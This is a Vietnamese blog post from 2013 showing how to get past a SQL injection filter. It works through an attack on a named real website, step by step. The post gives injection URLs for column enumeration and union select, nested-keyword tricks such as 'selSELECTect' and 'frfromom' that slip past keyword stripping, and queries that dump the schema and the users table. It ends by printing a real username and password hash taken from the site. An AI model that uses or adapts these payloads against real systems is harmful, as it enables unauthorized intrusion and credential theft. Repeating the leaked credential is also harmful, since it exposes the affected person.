Thứ Hai, 14 tháng 1, 2013

Một số cách bypass sqli


Phần đầu mình lấy của Judon trong vhb

Phần 1


Báo lỗi
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3


Thực hiện lệnh order by tìm cột lỗi
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 9--   // ko lỗi nhé

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 10--  // báo lỗi Unknown column '10' in 'order clause'

=>> có 10 cột từ 0-9

Bây giờ thực hiện union select thôi :D

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union select 1,2,3,4,5,6,7,8,9--     // báo lỗi Comando SQL:
SELECT * FROM artigos WHERE id = null union 1,2,3,4,5,6,7,8,9

không thấy chữ select đâu,dự là bị thịt mất rồi,nên ta thay bằng câu lệnh sau :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union selselectect 1,2,3,4,5,6,7,8,9--

(  thay select= selsellectect,seselectlect…,khi chữ select bị tô đậm bị thịt mất,thì vẫn còn 1 chữ select )

Cau lệnh đúng =>> có 3 cột lỗi là 4,5,7

 

Tìm table :

 

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130 UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()—

 

// lại bị thịt mất từ FROM    và   WHERE

Nhưng k sao,vẫn áp dụng cách trên ta có :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 frfromom information_schema.tables whwhereere table_schema=database()—

 

Xuất hiện 1 đống các table

             artigos,artigos_categoria,artigos_comentario,carta_dia,contato,depoimentos,duvidas,indique,links,links_categoria,usuarios


usuarios chắc là bảng user đây

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(column_name),5,6,7,8,9 frfromom information_schema.columns whwhereere table_name=0x7573756172696f73—

             id,nome,email,login,senha,tipo


nome là name,còn senha là pass :
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(nome,0x3a,senha),5,6,7,8,9 frfromom usuarios—

roselaura: e71aec8b8e27a13ed30128d39a8d01e0

Phần 2:từ từ viết :))




 

 

 

 



Không có nhận xét nào:

Đăng nhận xét